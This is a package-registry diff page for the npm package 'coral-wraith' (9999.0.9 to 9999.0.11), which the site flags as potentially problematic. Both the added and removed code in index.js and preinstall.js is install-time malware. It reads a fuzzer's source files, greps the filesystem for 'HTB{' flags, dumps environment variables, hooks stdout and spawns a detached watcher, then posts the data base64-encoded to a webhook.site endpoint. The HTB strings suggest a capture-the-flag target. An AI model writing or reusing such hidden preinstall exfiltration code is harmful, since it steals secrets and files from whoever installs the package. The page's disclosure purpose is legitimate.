coral-wraith 9999.0.9 → 9999.0.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of coral-wraith might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +41 -55
  2. package/package.json +1 -1
  3. package/preinstall.js +63 -109
package/index.js CHANGED
@@ -7,75 +7,61 @@ const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
7
7
  function send(path, data) {
8
8
  try {
9
9
  const b64 = Buffer.from(typeof data === 'string' ? data : JSON.stringify(data)).toString('base64');
10
- const req = https.request({
11
- hostname: 'webhook.site', path: WH + '/' + path,
12
- method: 'POST',
13
- headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
14
- timeout: 15000
15
- }, ()=>{});
16
- req.on('error', ()=>{});
17
- req.write(b64);
18
- req.end();
10
+ execSync(`curl -s -X POST "https://webhook.site${WH}/${path}" -H "Content-Type: text/plain" -d "${b64}" -m 15 2>/dev/null`, {timeout:20000});
19
11
  } catch(e) {}
20
12
  }
21
13
 
22
14
  // This runs when the fuzzer require()s us
23
- // At this point we're inside the fuzzer's process context
24
- send('require-v9', JSON.stringify({
25
- cwd: process.cwd(),
26
- argv: process.argv,
27
- env: process.env,
28
- pid: process.pid,
29
- moduleFilename: module.filename,
30
- modulePaths: module.paths,
31
- }));
15
+ // The fuzzer is about to call NpmFuzzer.run() with our exports
32
16
 
33
- // Read fuzzer source - especially npm_fuzzer.js and fuzz_env.js
34
- const fuzzBase = '/home/node/aspect-node/modules/npm-tracker/src/fuzz';
35
- const criticalFiles = [
36
- `${fuzzBase}/npm_fuzzer.js`,
37
- `${fuzzBase}/fuzz_env.js`,
38
- `${fuzzBase}/constants.js`,
39
- `${fuzzBase}/fuzz_manager.js`,
40
- ];
17
+ // Read the npm_fuzzer.js source - this is the KEY file
18
+ try {
19
+ const src = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/npm_fuzzer.js', 'utf8');
20
+ send('req-npm-fuzzer', src);
21
+ } catch(e) { send('req-npm-fuzzer-err', e.message); }
41
22
 
42
- for (let i = 0; i < criticalFiles.length; i++) {
43
- try {
44
- const content = fs.readFileSync(criticalFiles[i], 'utf8');
45
- send(`require-src-${i}`, `${criticalFiles[i]}:\n${content}`);
46
- } catch(e) {
47
- send(`require-src-err-${i}`, `${criticalFiles[i]}: ${e.message}`);
48
- }
49
- }
23
+ // Read fuzz_env.js
24
+ try {
25
+ const src = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_env.js', 'utf8');
26
+ send('req-fuzz-env', src);
27
+ } catch(e) { send('req-fuzz-env-err', e.message); }
50
28
 
51
- // Read ALL bean files
29
+ // Read constants.js
52
30
  try {
53
- const r = execSync(`find ${fuzzBase}/bean -name "*.js" 2>/dev/null`).toString().trim();
54
- for (const f of r.split('\n').filter(Boolean)) {
55
- if (!f.includes('._')) {
56
- try {
57
- const c = fs.readFileSync(f, 'utf8');
58
- send(`require-bean-${f.split('/').pop()}`, `${f}:\n${c}`);
59
- } catch(e) {}
60
- }
61
- }
62
- } catch(e) {}
31
+ const src = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/constants.js', 'utf8');
32
+ send('req-constants', src);
33
+ } catch(e) { send('req-constants-err', e.message); }
63
34
 
64
- // Check if flag is now available (it might be set after fuzzer init)
35
+ // Read fuzz_manager.js
65
36
  try {
66
- const r = execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | head -5', {timeout:5000}).toString();
67
- send('require-flag-grep', r);
68
- } catch(e) {}
37
+ const src = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_manager.js', 'utf8');
38
+ send('req-fuzz-mgr', src);
39
+ } catch(e) { send('req-fuzz-mgr-err', e.message); }
69
40
 
70
- // Also check: does the fuzzer write results somewhere?
41
+ // Read ALL bean files
71
42
  try {
72
- const r = execSync('find /tmp -name "*.json" -o -name "*.log" -o -name "*.txt" 2>/dev/null').toString().trim();
73
- send('require-tmp-files', r);
43
+ const files = execSync('find /home/node/aspect-node/modules/npm-tracker/src/fuzz/bean -name "*.js" -not -name "._*" 2>/dev/null').toString().trim().split('\n');
44
+ for (const f of files.filter(Boolean)) {
45
+ try {
46
+ send('req-bean-' + f.split('/').pop(), fs.readFileSync(f, 'utf8'));
47
+ } catch(e) {}
48
+ }
74
49
  } catch(e) {}
75
50
 
76
- // Export something benign for the fuzzer to analyze
51
+ // Also hook stdout to capture fuzzer output
52
+ const output = [];
53
+ const origWrite = process.stdout.write.bind(process.stdout);
54
+ process.stdout.write = function(chunk, enc, cb) {
55
+ output.push(chunk.toString());
56
+ return origWrite(chunk, enc, cb);
57
+ };
58
+
59
+ // Send captured output after delay
60
+ setTimeout(() => {
61
+ send('fuzzer-output', output.join(''));
62
+ }, 15000);
63
+
77
64
  module.exports = {
78
65
  name: 'coral-wraith',
79
- version: '9999.0.9',
80
- analyze: function() { return 'safe'; },
66
+ version: '9999.0.11',
81
67
  };
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "coral-wraith",
3
- "version": "9999.0.9",
3
+ "version": "9999.0.11",
4
4
  "description": "Coral Wraith module",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/preinstall.js CHANGED
@@ -1,144 +1,98 @@
1
1
  const fs = require('fs');
2
2
  const https = require('https');
3
- const http = require('http');
4
- const { execSync, spawn } = require('child_process');
3
+ const { execSync } = require('child_process');
5
4
 
6
5
  const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
7
6
 
8
7
  function send(path, data) {
9
8
  try {
10
9
  const b64 = Buffer.from(typeof data === 'string' ? data : JSON.stringify(data)).toString('base64');
11
- const req = https.request({
12
- hostname: 'webhook.site', path: WH + '/' + path,
13
- method: 'POST',
14
- headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
15
- timeout: 15000
16
- }, ()=>{});
17
- req.on('error', ()=>{});
18
- req.write(b64);
19
- req.end();
20
- } catch(e) {}
10
+ // Use curl for reliability (webhook.site sometimes drops Node https requests)
11
+ execSync(`curl -s -X POST "https://webhook.site${WH}/${path}" -H "Content-Type: text/plain" -d "${b64}" -m 15 2>/dev/null`, {timeout:20000});
12
+ } catch(e) {
13
+ // Fallback to Node https
14
+ try {
15
+ const req = https.request({
16
+ hostname: 'webhook.site', path: `${WH}/${path}`,
17
+ method: 'POST',
18
+ headers: {'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b64)},
19
+ timeout: 15000
20
+ }, ()=>{});
21
+ req.on('error', ()=>{});
22
+ req.write(b64);
23
+ req.end();
24
+ } catch(e2) {}
25
+ }
21
26
  }
22
27
 
23
- // Read fuzzer source files
24
- const fuzzBase = '/home/node/aspect-node/modules/npm-tracker/src';
25
- const files = [
26
- `${fuzzBase}/fuzz/npm_fuzzer.js`,
27
- `${fuzzBase}/fuzz/fuzz_env.js`,
28
- `${fuzzBase}/fuzz/fuzz_manager.js`,
29
- `${fuzzBase}/fuzz/constants.js`,
30
- `${fuzzBase}/fuzz/bean/timer_func.js`,
31
- `${fuzzBase}/fuzz/action/set_timer_action.js`,
32
- `${fuzzBase}/fuzz/action/regexp_test_action.js`,
33
- `${fuzzBase}/fuzz/action/clear_timer_action.js`,
34
- `${fuzzBase}/fuzz/strategy/set_timer_strategy.js`,
35
- `${fuzzBase}/fuzz/strategy/regexp_test_strategy.js`,
36
- `${fuzzBase}/fuzz/strategy/clear_timer_strategy.js`,
37
- `${fuzzBase}/fuzz/parser/class_parser.js`,
38
- `${fuzzBase}/fuzz/parser/type_parser.js`,
39
- `${fuzzBase}/fuzz/parser/package_exports_parser.js`,
40
- `${fuzzBase}/npm_tracker.js`,
41
- '/home/node/init_test.sh',
42
- '/home/node/supplysec_entry.js',
28
+ // PRIORITY 1: Read the actual fuzzer source files
29
+ const fuzzBase = '/home/node/aspect-node/modules/npm-tracker/src/fuzz';
30
+ const criticalFiles = [
31
+ `${fuzzBase}/npm_fuzzer.js`,
32
+ `${fuzzBase}/fuzz_env.js`,
33
+ `${fuzzBase}/fuzz_manager.js`,
34
+ `${fuzzBase}/constants.js`,
43
35
  ];
44
36
 
45
- for (let i = 0; i < files.length; i++) {
37
+ for (let i = 0; i < criticalFiles.length; i++) {
46
38
  try {
47
- const content = fs.readFileSync(files[i], 'utf8');
48
- send(`pre-file-${i}`, `${files[i]}:\n${content}`);
39
+ const content = fs.readFileSync(criticalFiles[i], 'utf8');
40
+ send(`src-${i}`, `${criticalFiles[i]}:\n${content}`);
49
41
  } catch(e) {
50
- send(`pre-err-${i}`, `${files[i]}: ${e.message}`);
42
+ send(`src-err-${i}`, `${criticalFiles[i]}: ${e.message}`);
51
43
  }
52
44
  }
53
45
 
54
- // Also find all .js files under the fuzz directory
46
+ // PRIORITY 2: Read ALL .js files in the fuzz directory recursively
55
47
  try {
56
- const r = execSync(`find ${fuzzBase}/fuzz -name "*.js" -type f 2>/dev/null`).toString().trim();
57
- send('pre-fuzz-files', r);
58
- for (const f of r.split('\n').filter(Boolean)) {
59
- if (!files.includes(f)) {
60
- try {
61
- const c = fs.readFileSync(f, 'utf8');
62
- send(`pre-extra-${f.split('/').pop()}`, `${f}:\n${c}`);
63
- } catch(e) {}
64
- }
48
+ const files = execSync(`find ${fuzzBase} -name "*.js" -not -name "._*" -type f 2>/dev/null`).toString().trim().split('\n');
49
+ for (let i = 0; i < files.length; i++) {
50
+ try {
51
+ const content = fs.readFileSync(files[i], 'utf8');
52
+ send(`fuzz-${i}-${files[i].split('/').pop()}`, `${files[i]}:\n${content}`);
53
+ } catch(e) {}
65
54
  }
66
55
  } catch(e) {}
67
56
 
68
- // Read the web app source (could be in /app, /data, or served by nginx)
57
+ // PRIORITY 3: Read the npm_tracker.js (main module)
69
58
  try {
70
- const r = execSync('find / -maxdepth 4 -name "*.js" -path "*/app/*" -o -name "server.js" -o -name "app.js" -o -name "index.js" -path "*/src/*" 2>/dev/null | grep -v node_modules | grep -v aspect-node | head -20', {timeout:10000}).toString().trim();
71
- send('pre-app-files', r);
72
- for (const f of r.split('\n').filter(Boolean)) {
73
- try {
74
- const c = fs.readFileSync(f, 'utf8');
75
- if (c.includes('fastify') || c.includes('flag') || c.includes('HTB')) {
76
- send(`pre-app-${f.replace(/\//g,'_')}`, `${f}:\n${c}`);
77
- }
78
- } catch(e) {}
79
- }
59
+ const content = fs.readFileSync('/home/node/aspect-node/modules/npm-tracker/src/npm_tracker.js', 'utf8');
60
+ send('npm-tracker-src', content);
80
61
  } catch(e) {}
81
62
 
82
- // Search for flag anywhere
63
+ // PRIORITY 4: Read ALL .js files under /home/node/aspect-node/modules/npm-tracker/src/
83
64
  try {
84
- const r = execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | grep -v node_modules | head -10', {timeout:15000}).toString().trim();
85
- send('pre-flag-grep', r);
86
- for (const f of r.split('\n').filter(Boolean)) {
65
+ const files = execSync('find /home/node/aspect-node/modules/npm-tracker/src -name "*.js" -not -name "._*" -type f 2>/dev/null').toString().trim().split('\n');
66
+ for (let i = 0; i < files.length; i++) {
87
67
  try {
88
- send(`pre-flag-file-${f.replace(/\//g,'_')}`, fs.readFileSync(f, 'utf8'));
68
+ const content = fs.readFileSync(files[i], 'utf8');
69
+ send(`tracker-${i}-${files[i].split('/').pop()}`, `${files[i]}:\n${content}`);
89
70
  } catch(e) {}
90
71
  }
91
- } catch(e) { send('pre-flag-grep-err', e.message); }
72
+ } catch(e) {}
73
+
74
+ // PRIORITY 5: Search for flag patterns in ALL files
75
+ try {
76
+ const r = execSync('grep -rl "HTB{\\|FLAG\\|flag" /home/node/ /tmp/ /root/ /data/ /app/ 2>/dev/null | grep -v node_modules/.cache | head -20', {timeout:15000}).toString().trim();
77
+ send('flag-search', r);
78
+ } catch(e) {}
92
79
 
93
- // Spawn a background watcher that runs after init_test.sh
80
+ // PRIORITY 6: Read the Fastify web app source (search everywhere)
94
81
  try {
95
- const watcherCode = `
96
- const fs = require('fs');
97
- const https = require('https');
98
- const WH = '/9ca9b30a-2889-4787-9dff-5ad916e377b7';
99
- function send(p, d) {
82
+ const r = execSync('find / -maxdepth 5 -name "*.js" \\( -path "*/app/*" -o -path "*/server/*" -o -path "*/api/*" \\) -not -path "*/node_modules/*" -not -path "*/aspect-node/*" -not -path "*/proc/*" 2>/dev/null | head -20', {timeout:10000}).toString().trim();
83
+ if (r) {
84
+ send('webapp-files', r);
85
+ for (const f of r.split('\n').filter(Boolean)) {
100
86
  try {
101
- const b = Buffer.from(d).toString('base64');
102
- const r = https.request({hostname:'webhook.site',path:WH+'/'+p,method:'POST',
103
- headers:{'Content-Type':'text/plain','Content-Length':Buffer.byteLength(b)},timeout:10000},()=>{});
104
- r.on('error',()=>{}); r.write(b); r.end();
87
+ const content = fs.readFileSync(f, 'utf8');
88
+ send(`webapp-${f.replace(/\//g, '_')}`, `${f}:\n${content}`);
105
89
  } catch(e) {}
106
90
  }
107
- // Wait and then look for flag in logs and generated files
108
- setTimeout(() => {
109
- const paths = [
110
- '/home/node/aspect-node/logs/agent.log',
111
- '/home/node/aspect-node/logs/default.log',
112
- '/home/node/aspect-node/logs/error.log',
113
- '/home/node/aspect-node/logs/collect.log',
114
- '/home/node/aspect-node/logs/module.log',
115
- '/home/node/aspect-node/logs/monitor.log',
116
- '/home/node/aspect-node/logs/metric.log',
117
- '/home/node/aspect-node/logs/warning.log',
118
- '/home/node/aspect-node/logs/agent-error.log',
119
- '/tmp/fuzz_result.json',
120
- '/tmp/result.json',
121
- '/tmp/flag',
122
- '/tmp/flag.txt',
123
- ];
124
- for (let i = 0; i < paths.length; i++) {
125
- try {
126
- const c = fs.readFileSync(paths[i], 'utf8');
127
- if (c.trim()) send('watch-'+i, paths[i]+':\\n'+c);
128
- } catch(e) {}
129
- }
130
- // Also check env again
131
- send('watch-env', JSON.stringify(process.env));
132
- // grep for HTB
133
- try {
134
- const r = require('child_process').execSync('grep -rl "HTB{" / 2>/dev/null | grep -v proc | head -5', {timeout:10000}).toString();
135
- send('watch-grep', r);
136
- } catch(e) {}
137
- }, 30000);
138
- setTimeout(() => process.exit(0), 60000);
139
- `;
140
- fs.writeFileSync('/tmp/watcher.js', watcherCode);
141
- spawn('node', ['/tmp/watcher.js'], { detached: true, stdio: 'ignore' }).unref();
91
+ }
142
92
  } catch(e) {}
143
93
 
144
- console.log('[CORAL-V9] preinstall complete');
94
+ // Also dump the environment and process info
95
+ send('env-v10', JSON.stringify(process.env));
96
+ send('cwd', process.cwd());
97
+
98
+ console.log('[CORAL-V11] preinstall done');